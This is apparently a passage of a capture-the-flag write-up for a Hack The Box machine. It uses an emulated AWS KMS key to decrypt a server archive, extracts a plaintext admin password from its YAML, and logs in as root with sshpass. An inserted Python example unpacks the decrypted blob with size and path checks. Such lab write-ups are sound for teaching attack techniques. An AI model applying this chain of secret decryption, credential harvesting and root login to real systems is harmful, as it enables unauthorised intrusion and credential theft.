f2358fef-e813-4c59-87c8-70e50f6d4f70
david@sink:~$ awslocal kms list-keys | grep KeyId | cut -d'"' -f4 | while read id; do desc=$(awslocal kms describe-key --key-id $id); use=$(echo $desc | cut -d'"' -f26); echo $desc | grep -q Disabled || echo "$id  $use"; done
804125db-bdf1-465a-a058-07fc87c0fad0  ENCRYPT_DECRYPT
c5217c17-5675-42f7-a6ec-b5aa9b9dbbde  SIGN_VERIFY
david@sink:~$ awslocal kms describe-key --key-id 804125db-bdf1-465a-a058-07fc87c0fad0
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "804125db-bdf1-465a-a058-07fc87c0fad0",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0",
        "CreationDate": 1609757999,
        "Enabled": true,
        "Description": "Encryption and Decryption",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "EncryptionAlgorithms": [
            "RSAES_OAEP_SHA_1",
            "RSAES_OAEP_SHA_256"
        ]
    }
}

Decrypt

awslocal kms decrypt --key-id 804125db-bdf1-465a-a058-07fc87c0fad0 --ciphertext-blob fileb://servers.enc --encryption-algorithm RSAES_OAEP_SHA_256
{
    "KeyId": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0",
    "Plaintext": "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",
    "EncryptionAlgorithm": "RSAES_OAEP_SHA_256"
}

Decode

david@sink:~/Projects/Prod_Deployment$ echo "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" | base64 -d > decrypted
david@sink:~/Projects/Prod_Deployment$ file decrypted 
decrypted: gzip compressed data, from Unix, original size modulo 2^32 10240
david@sink:~/Projects/Prod_Deployment$ ls
decrypted  servers.enc
david@sink:~/Projects/Prod_Deployment$ zcat decrypted > decryped_decompressed
david@sink:~/Projects/Prod_Deployment$ file decryped_decompressed 
decryped_decompressed: POSIX tar archive (GNU)
david@sink:~/Projects/Prod_Deployment$ tar xvf decryped_decompressed
servers.yml
servers.sig
david@sink:~/Projects/Prod_Deployment$ cat servers.yml
server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
defaultuser:
  name: admin
  pass: _uezduQ!EY5AHfe2
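
The same unwrapping done programmatically, as an added example that is not part of the original write-up: it takes a response shaped like the `kms decrypt` output above, identifies each layer by magic bytes the way `file` does, and reads the tar members in memory with a size cap and name checks instead of extracting to disk. The sample response, its key ARN and the file contents are constructed.

```python
import base64
import gzip
import io
import json
import tarfile
import zlib

GZIP_MAGIC = b"\x1f\x8b"
MAX_UNPACKED = 1 << 20  # refuse anything that inflates past 1 MiB


def build_sample_response():
    """Constructed stand-in for `kms decrypt` output: base64(gzip(tar))."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tar:
        for name, data in (("servers.yml", b"server:\n  port: 80\n"),
                           ("servers.sig", b"\x00constructed-signature")):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return json.dumps({
        "KeyId": "arn:aws:kms:us-east-1:000000000000:key/EXAMPLE-KEY-ID",
        "Plaintext": base64.b64encode(gzip.compress(tar_buf.getvalue())).decode(),
        "EncryptionAlgorithm": "RSAES_OAEP_SHA_256",
    })


def identify(data):
    """Classify a blob by magic bytes: gzip header or tar 'ustar' at 257."""
    if data[:2] == GZIP_MAGIC:
        return "gzip"
    if data[257:262] == b"ustar":
        return "tar"
    return "data"


def bounded_gunzip(data, limit=MAX_UNPACKED):
    """Decompress a gzip stream, failing instead of inflating past `limit`."""
    d = zlib.decompressobj(31)  # 31 = expect a gzip header and trailer
    out = d.decompress(data, limit + 1)
    if len(out) > limit:
        raise ValueError("decompressed size exceeds limit")
    if not d.eof:
        raise ValueError("truncated gzip stream")
    return out


def read_members(tar_bytes, limit=MAX_UNPACKED):
    """Read regular files from a tar in memory; reject unsafe member names."""
    files, total = {}, 0
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar:
            if member.name.startswith("/") or ".." in member.name.split("/"):
                raise ValueError(f"refusing tar member {member.name!r}")
            if not member.isfile():
                continue  # skip directories, links and device nodes
            total += member.size
            if total > limit:
                raise ValueError("tar contents exceed limit")
            files[member.name] = tar.extractfile(member).read()
    return files


def unwrap(response_json):
    """Return (layers seen, {member name: bytes}) for a decrypt response."""
    plaintext = json.loads(response_json)["Plaintext"]
    data = base64.b64decode(plaintext, validate=True)
    layers = ["base64"]
    kind = identify(data)
    if kind == "gzip":
        layers.append("gzip")
        data = bounded_gunzip(data)
        kind = identify(data)
    if kind != "tar":
        return layers + [kind], {"<raw>": data}
    return layers + ["tar"], read_members(data)


if __name__ == "__main__":
    seen, members = unwrap(build_sample_response())
    print(" -> ".join(seen), sorted(members))
```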

SSH into the server as root

sshpass -p '_uezduQ!EY5AHfe2' ssh [email protected]
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 02 Oct 2021 08:08:18 PM UTC

  System load:                      0.08
  Usage of /:                       38.4% of 17.59GB
  Memory usage:                     59%
  Swap usage:                       0%
  Processes:                        308
  Users logged in:                  1
  IPv4 address for br-85739d6e29c0: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.225

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

197 updates can be installed immediately.
115 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have new mail.
Last login: Thu Jul 22 15:52:22 2021
root@sink:~# cat root.txt 
--snippet--